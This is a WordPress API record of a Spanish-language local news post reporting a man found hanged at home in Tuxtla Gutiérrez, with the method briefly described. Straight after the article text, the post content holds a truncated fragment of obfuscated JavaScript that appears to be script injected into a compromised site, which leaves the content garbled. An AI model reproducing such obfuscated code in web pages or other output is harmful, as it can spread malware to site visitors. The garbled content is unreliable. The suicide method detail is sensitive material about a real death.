{"id":10669,"date":"2023-06-21T01:28:50","date_gmt":"2023-06-21T01:28:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10669"},"modified":"2023-06-21T01:28:51","modified_gmt":"2023-06-21T01:28:51","slug":"localizan-ahrcad-al-figura-en-la-francisco-i-madero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10669","title":{"rendered":"Localizan ah@rcad@ al &#8220;Figura&#8221; en la Francisco I Madero"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1687310481065-1024x576.jpg\" alt=\"\" class=\"wp-image-10670\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1687310481065-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1687310481065-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1687310481065-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1687310481065.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 20 de junio del 2023.- En los primeros minutos de este martes un hombre identificado como el &#8220;Figura&#8221;, al interior de un domicilio localizado en en la Colonia Francisco I Madero de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que los familiares del hoy occiso relataron que se encontraba en la vivienda localizada en la Calle Central, entre Avenida Manuel Velasco y Segunda Oriente, y de manera repentina escucharon un fuerte ruido.Al salir a verificar lo que ocurr\u00eda observaron a Alejandro &#8220;N&#8221; colgado sujeto del cuello con un cintur\u00f3n a la estructura.Inmediatamente llamaron a los n\u00fameros de emergencia pero ya nada pudieron hacer, el &#8220;Figura&#8221;, hab\u00eda muerto.Al lugar arribaron peritos de la Fiscal\u00eda General del Estado para realizar las diligencias correspondientes, levantar el cuerpo y trasladarlo al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 20 de junio del 2023.- En los primeros minutos de este martes un hombre identificado como el &#8220;Figura&#8221;, al interior de un domicilio localizado en en la Colonia Francisco I Madero de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que los familiares del hoy occiso relataron que se encontraba en la vivienda localizada en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10670,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10669","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10669","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10669"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10669\/revisions"}],"predecessor-version":[{"id":10671,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10669\/revisions\/10671"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10670"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10669"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10669"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10669"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}